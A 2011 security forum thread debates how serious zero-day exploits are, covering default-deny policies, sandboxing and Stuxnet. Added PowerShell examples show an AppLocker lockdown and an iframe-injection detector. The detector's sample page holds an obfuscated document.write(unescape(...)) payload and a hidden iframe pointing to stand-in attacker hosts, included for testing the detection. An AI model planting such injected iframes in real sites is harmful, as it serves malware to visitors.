0-Days Not As Big of a Threat as You Think

Discussion in 'other security issues & news' started by dw426, Oct 13, 2011.

Thread Status:
Not open for further replies.
  1. dw426

  2. Dark Shadow

    IMO, it's just scare tactics to try to get people to spend their money and bloat their PC to death with security software.
     
  3. Hungry Man

    Let's make this very clear... the article is talking about zero-day exploits and not zero-day malware.

    It's fairly well known that you're more likely to be exploited by an out-of-date plugin/browser because of KNOWN vulnerabilities.

    But most malware infections are probably from 0day malicious files.


    The reason people talk about 0days so much is pretty clear: they're unknown. Defending against known exploits is often as easy as updating your software. Defending against unknown exploits means creating strong policies, etc., and hoping for the best.

    I read the article a few days ago and didn't think much of it. 0days should definitely be taken seriously whether malicious files or exploits.
     
  4. Dark Shadow

    Have no fear, Sandboxie is here, and a change of underwear in case my PC gets soiled. :D
     
  5. wat0114

    These statements seem to sum it up nicely...

     
  6. 1chaoticadult

    I don't take any 0-day seriously. I take my security policy instead.
     
  7. Hungry Man

    Policy in windows isn't strong enough for me to feel confident.

    Maybe the Protogon filesystem will help with permissions, idk.
     
  8. noone_particular

    Zero-day exploits and the malware they deliver are only a threat on systems where they're allowed to execute, aka systems relying on conventional default-permit based security apps. A zero-day exploit is meaningless if it can't deliver a functional malicious payload. Of course the security app vendors won't tell you this. There's no profit in default-deny based security.
     
  9. cozumel

    Running a virtual machine within your OS and running Sandboxie within the VM would still not prevent a potential attack from an unknown exploit, as anything is vulnerable if the malware is well designed and targets a specific vulnerability.

    Being prepared, aware and having robust procedures is all we can do. I like to think that that is more than 'hoping for the best' and keeping your fingers crossed lol
     
  10. m00nbl00d

    After November (day 3), things will be safer for AppLocker users. :D
     
  11. dw426

    Well, I disagree. The article reports that zero-day exploit threats are practically nil. So, even a zero-day malware piece that is designed to exploit a vulnerability that is no longer there, is also non-threatening. Besides, I have not seen, in all my years of computing that many true "zero-day" malware. The vast majority of malware that is "new", is nothing more than tweaked versions of already familiar malware. I really don't care that security companies come out with their scare reports. I only care about what is in the wild and a real threat to users.

    I'm sorry, but security companies pull in millions/billions a year playing the same game the "Haunted House" industry does, which is scare the hell out of you.
     
  12. 1chaoticadult

    That trick only works on the ill-informed.
     
  13. m00nbl00d

    The question is: In whom to believe?

    A few weeks ago, Google released a report stating otherwise. Who's being the big liar? Google? Microsoft?

    :argh:

    A zero-day exploiting a patched vulnerability is not dangerous, of course. But, the same zero-day will remain dangerous as long as many systems and applications run unpatched, and that is, unfortunately, a reality.

    But, if exploits aren't, and never were, that much of a threat, then why does Internet Explorer have a sandbox? Why sandboxing something that isn't a threat? I suppose Microsoft will take it away with IE10?
     
  14. Rmus (Exploit Analyst)

    The Stuxnet worm is a good example. To install its payload, it used 1 - 4 Zero-day exploits (depending on how you define Zero-day).

    INFILTRATING CRITICAL INFRASTRUCTURES
    http://www.aisec.fraunhofer.de/content/dam/sitmuc/en/pdf/studien/studie_stuxnet.pdf
    A secure Default-Deny Policy stops Stuxnet cold.

    A Policy doesn't always mean a product. In the original targeted scenarios, no extra security product was required:

    Shortly after the emergence of the LNK exploit, I happened to meet someone who is a system administrator overseeing 300+ computers. He said that they had a Group Policy whereby no executables can run/load from external media on the work computers.

    End of Exploit -- Zero-day or not, it didn't matter.

    regards,

    -rich
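
Added example, not part of Rmus's post or of any vendor documentation: the "no executables from anywhere we did not allow" policy the administrator above described, expressed as an AppLocker rule set and dry-run with Test-AppLockerPolicy before it is enforced. It assumes a Windows edition that ships the AppLocker cmdlets (Windows 7 Enterprise/Ultimate or Server 2008 R2 and later) and an elevated PowerShell session; the rule Ids are arbitrary GUIDs, and the file copied into %TEMP% is a stand-in created for the dry run, not anything from the thread.

```powershell
# Added example (not from the thread): a default-deny AppLocker policy for
# the Exe rule collection. Once an enforced collection holds any rule,
# everything it does not match is denied, so an .exe started from a USB
# stick, %TEMP% or Downloads is blocked whether or not the exploit that
# dropped it was a zero-day. Assumptions: AppLocker-capable Windows,
# elevated session. Rule Ids are arbitrary GUIDs.
$policyXml = @'
<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <!-- Explicit Deny wins over any Allow, so this also stops members of
         Administrators launching from removable storage. %HOT% is the
         AppLocker variable for removable drives (USB); %REMOVABLE% covers
         optical media. -->
    <FilePathRule Id="6a1f3b5d-5c0a-4b6e-9e2a-0d7c4c1f9b02"
                  Name="Deny executables on removable storage" Description=""
                  UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions>
        <FilePathCondition Path="%HOT%\*" />
      </Conditions>
    </FilePathRule>
    <FilePathRule Id="a61c8b2c-a319-4cd0-9690-d2177cad7b51"
                  Name="Allow Program Files" Description=""
                  UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions>
        <FilePathCondition Path="%PROGRAMFILES%\*" />
      </Conditions>
    </FilePathRule>
    <!-- The Exceptions close the user-writable subfolders that a plain
         "%WINDIR%\*" rule would otherwise allow. -->
    <FilePathRule Id="921cc481-6e17-4653-8f75-050b80acca20"
                  Name="Allow Windows folder" Description=""
                  UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions>
        <FilePathCondition Path="%WINDIR%\*" />
      </Conditions>
      <Exceptions>
        <FilePathCondition Path="%WINDIR%\Temp\*" />
        <FilePathCondition Path="%WINDIR%\Tasks\*" />
      </Exceptions>
    </FilePathRule>
    <FilePathRule Id="fd686d83-a829-4351-8ff4-27c7de5755d2"
                  Name="Administrators: all files" Description=""
                  UserOrGroupSid="S-1-5-32-544" Action="Allow">
      <Conditions>
        <FilePathCondition Path="*" />
      </Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>
'@

$policyPath = Join-Path $env:TEMP 'exe-default-deny.xml'
Set-Content -Path $policyPath -Value $policyXml -Encoding UTF8

# Dry run before enforcing. Test-AppLockerPolicy needs files that exist, so
# a copy of calc.exe in %TEMP% stands in for a payload a browser exploit
# just dropped (constructed for the demo); point -Path at E:\whatever.exe
# to check a real USB stick. A path matched by no Allow rule is reported
# as denied with an empty MatchingRule.
$dropped = Join-Path $env:TEMP 'dropped-payload.exe'
Copy-Item -Path "$env:WINDIR\System32\calc.exe" -Destination $dropped -Force

Test-AppLockerPolicy -XmlPolicy $policyPath -User Everyone `
    -Path $dropped, "$env:WINDIR\System32\notepad.exe" |
    Format-Table FilePath, PolicyDecision, MatchingRule -AutoSize

# Enforce on this machine (in a domain, import the same XML into a GPO).
# AppLocker evaluates rules only while the Application Identity service
# runs; sc.exe is used because Set-Service cannot change this service's
# start type on newer Windows builds.
sc.exe config appidsvc start= auto | Out-Null
Start-Service -Name AppIDSvc
Set-AppLockerPolicy -XmlPolicy $policyPath
```

Pilot with EnforcementMode="AuditOnly" and read the Microsoft-Windows-AppLocker/EXE and DLL event log before switching to Enabled. Path rules are only as strong as the ACLs on the folders they name: any user-writable directory under an allowed path silently becomes an allow, so audit those folders with icacls or use publisher rules for anything that lives there. The Exe collection covers only .exe and .com files; DLLs, scripts, installers and packaged apps each need their own collection.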
     
  15. Rmus (Exploit Analyst)

    No sane person will deny that exploits are a threat.

    I've contended in the past that a Sandbox is a fail-safe device to contain the malware payload that is permitted to execute and get by the perimeter defense.

    Nothing wrong with that at all, but not necessary if you feel secure with your Policies and Procedures that prevent the exploit from running in the first place.

    Example: Adobe's Sandbox.

    With the browser properly configured, the malicious payload will never make its way into the Sandbox because the code embedded in the web page will not be able to execute its commands to drop the payload executable.

    Regards,

    -rich
     
  16. Sully

    I think most everyone can agree that there are very real threats lying about. Whenever I see this sort of talk, it usually reminds me that I do need to have a set of protocols and tools in place, because threats do exist - but it also reminds me that I am very happy to be out of that "business model".

    There have been various threads here over the years about whether an average user should have to make any decisions (become educated) or not. I don't think it is too outlandish to suggest that if there is no education, then they are merely a piece of the security business model. And like all businesses, you must have demand to sell your supply. Are reports and talk of 0-day threats fact or fiction?

    Well, they are both. Some reports seem rather obvious (at least to me) due to the sensationalism they depict (the world is doomed, unless you use our product) and others seem to downplay it as a non-existent threat.

    That is why I say users who really want "freedom" need to be educated. There are pitfalls out there, but you have to understand them to avoid them. And the pitfalls are not only viruses/malware/trojans, but also really crappy software that you have to buy, or freeware that just sucks. The amount of knowledge needed of course will vary greatly, but lack of any knowledge or sticking your head in the sand both seem illogical to me.

    Sul.
     
  17. noone_particular

    Sandboxing is necessary to contain code that shouldn't have been allowed to execute in the first place. IMO sandboxing should be regarded as a 2nd line of defense. It should be used to contain legitimate attack surface applications in order to protect the rest of the system from code embedded in the files, media, etc. that these apps open, a malicious PDF for instance. Other non-whitelisted executables should never get that far. Running unknown executables in a sandbox keeps the user in a continual arms race with those who write that code. Eventually, someone breaks the containment, the sandbox gets patched, and the cycle repeats. It's the usual penetrate and patch routine, the same reactive policy that results in casualties and/or damage before the patch is released.

    Very true. There are several ways to implement a default-deny policy, just as there are several ways to sandbox your attack surface, e.g. a sandbox app, virtual system, system policy, 3rd party HIPS rules, etc. What the user chooses is largely a matter of preference and trust. Myself, I don't trust Microsoft's built in tools to control the OS components, no matter how well it controls other software. That aside, for exploits that target the attack surface and malicious code contained in legitimate appearing files, how you sandbox them is not particularly important, as long as you do.
     
  18. Hungry Man

    IDK why anyone is talking about sandboxing like it can't be policy.

    Anyways,

    Yes, 0day exploits are not a huge deal.

    But let's not forget:
    http://www.adobe.com/support/security/advisories/apsa11-01.html
    or even:
    http://www.zdnet.com/blog/security/adobe-flash-zero-day-exploit-in-the-wild/1189

    0-day exploits happen... and they're taken advantage of. They're not always in the OS but they DO happen. Uncommon or not they are absolutely not something to be scoffed at, again because it's so difficult to protect yourself against them.

    As for security companies and scare reports, idk about that. Considering that most security software absolutely fails to deal with 0days I don't think they'd focus much on that!

    Now to focus on this:
    I don't see your point.

    Zero-day malware does not have to use exploits, it can be entirely socially engineered. It also can be a simple update to an older piece of malware to move around heuristics/ blacklists.

    It's still 0day and most of the malware you run into probably hasn't existed for more than a few days. That's not always the case, but there are hundreds of new malicious files (updates or not they're 0day malicious files) and they DO get spread around a ton.

    Again, Microsoft is talking about exploits... not files. 0day files are actually what I'd say they consider to be the huge threat here. Consider smartscreen, the idea is to stop new files from being downloaded without the users knowledge. It's aimed at NEW socially engineered malware.

    And as was brought up by someone above, this is a report by Microsoft. We've seen just as fancy reports by Google and we've seen reports by others contradicting them. There are so many arguments both ways I personally have no clue anymore.

    On the one hand you've got Google, a company with more information on the web than nearly any other. Then we have Microsoft, a tech giant with more Windows-specific information than anyone else.

    Personally, I only care about 0day exploits. It's the only thing that's really just "out of my hands."
     
  19. LoneWolf

    Believe what you want, I'd rather be safe than sorry.

    Couldn't agree more.


    Well said.
    Some form of sandbox/containment/default deny policy is IMO a very wise decision, and will always be a part of my setup.
     
  20. CogitoTesting

    Oh my gosh, you are quite poetic. o_O.

    Thanks.
     
  21. noone_particular

    I did say it.
    I run a policy sandbox. The main difference is that it's enforced as much by HIPS as it is by the built in tools.
     
  22. Hungry Man

    Ah, well there we go.
     
  23. Dark Shadow

    Not really but thanks.
     
  24. TonyW

    And many of those are on sites which some of us don't come into contact with, unless you make a point of visiting malc0de, MDL or similar where they're listed there. And often not for long either.
     
  25. Hungry Man

    Most of those sites you visit via malware domain repositories are often opened up in an iframe and then linked via JavaScript to a hacked and legitimate domain.

    I believe that was the case with mysql.com

    http://blog.sucuri.net/2011/09/mysql-com-hacked-javascript-malware.html

    http://www.pc1news.com/news/0082/we...being-spread-through-legitimate-websites.html

    Websense Security Labs™ Report: Majority of Malware Being Spread Through Legitimate Websites
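
Added example, not from Hungry Man's post or from the Sucuri or Websense write-ups he links: a small PowerShell triage heuristic for the pattern he describes, an otherwise legitimate page carrying an iframe that is hidden and/or points off-site, including one a script assembles at load time with document.write(unescape(...)). The page, hosts and paths are constructed for the demo, and Get-IframeFinding and Find-SuspiciousIframe are names chosen here.

```powershell
# Added example (not from the thread). Flags <iframe> elements that are
# hidden (zero width/height, display:none, visibility:hidden) and/or whose
# src host differs from the host the page was fetched from, both in the
# raw markup and inside percent-encoded script bodies that write markup
# at load time. Sample HTML and hosts below are constructed for the demo.

function Get-IframeFinding {
    param(
        [string] $Text,      # HTML (or decoded script output) to scan
        [string] $PageHost,  # host the page was fetched from
        [string] $Origin     # where $Text came from, for the report
    )
    foreach ($m in [regex]::Matches($Text, '<iframe\b[^>]*>', 'IgnoreCase')) {
        $tag = $m.Value
        $src = [regex]::Match($tag, 'src\s*=\s*["'']?([^"''\s>]+)', 'IgnoreCase').Groups[1].Value
        $hidden = ($tag -match 'width\s*=\s*["'']?0\b') -or
                  ($tag -match 'height\s*=\s*["'']?0\b') -or
                  ($tag -match 'display\s*:\s*none') -or
                  ($tag -match 'visibility\s*:\s*hidden')
        $offSite = $false
        if ($src -match '^(?:https?:)?//([^/:?#]+)') {
            $offSite = ($Matches[1] -ne $PageHost)   # case-insensitive compare
        }
        if ($hidden -or $offSite) {
            [pscustomobject]@{
                Origin  = $Origin
                Src     = $src
                Hidden  = $hidden
                OffSite = $offSite
                Tag     = $tag
            }
        }
    }
}

function Find-SuspiciousIframe {
    param(
        [Parameter(Mandatory)] [string] $Html,
        [Parameter(Mandatory)] [string] $PageHost
    )
    # Pass 1: iframes present in the markup as delivered.
    Get-IframeFinding -Text $Html -PageHost $PageHost -Origin 'markup'

    # Pass 2: scripts that percent-decode and write markup at load time.
    # Decoding the script body exposes the iframe it would write so the
    # same checks apply. Other decoders (String.fromCharCode, custom
    # eval chains) are not handled here; extend the patterns as you meet them.
    $scripts = [regex]::Matches($Html, '<script\b[^>]*>(.*?)</script>', 'IgnoreCase, Singleline')
    foreach ($s in $scripts) {
        $body = $s.Groups[1].Value
        if ($body -match 'document\.write\s*\(\s*unescape\s*\(' -or
            $body -match 'eval\s*\(\s*unescape\s*\(') {
            $decoded = [System.Uri]::UnescapeDataString($body)
            Get-IframeFinding -Text $decoded -PageHost $PageHost -Origin 'document.write(unescape())'
        }
    }
}

# Constructed sample: one legitimate same-site embed (not reported), one
# hidden off-site iframe written by an obfuscated script, and one hidden
# off-site iframe sitting in the markup.
$sampleHtml = @'
<html><head><title>Downloads</title></head><body>
<iframe src="https://www.example.com/help/embed" width="600" height="400"></iframe>
<script type="text/javascript">
document.write(unescape('%3Ciframe%20src%3D%22http%3A//evil.example.net/in.cgi%3F3%22%20width%3D%220%22%20height%3D%220%22%3E%3C/iframe%3E'));
</script>
<p>Thank you for downloading.</p>
<iframe src="http://evil.example.org/landing.php" style="display:none"></iframe>
</body></html>
'@

Find-SuspiciousIframe -Html $sampleHtml -PageHost 'www.example.com' |
    Format-List Origin, Src, Hidden, OffSite, Tag
```

Feed it the body of a page fetched from an isolated analysis VM (for example the .Content of Invoke-WebRequest -UseBasicParsing) and compare the Src hosts it reports against a list such as MDL or malc0de. It is a triage heuristic only: an injection that lives in a script loaded from a third-party host, or that hides behind String.fromCharCode or a custom decoder, needs that script fetched and decoded before these checks say anything.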
     